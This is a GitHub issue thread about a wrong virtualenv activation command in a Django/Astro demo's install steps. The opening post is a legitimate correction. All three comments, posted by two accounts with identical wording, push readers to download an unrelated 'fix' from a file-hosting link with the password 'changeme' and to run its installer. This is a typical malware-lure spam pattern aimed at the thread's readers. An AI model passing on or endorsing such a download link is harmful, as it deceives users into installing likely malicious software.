### ISSUE TITLE
error install instrucction

### ISSUE THREAD

**Issue by jrep41** [marqetintl/django-astro-jsx-demo#2]
python3 -m venv env
. env/bin/activate  ----> must be: . env/Scripts/activate
cd django
pip3 install -r requirements.txt
python3 manage.py runserver

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
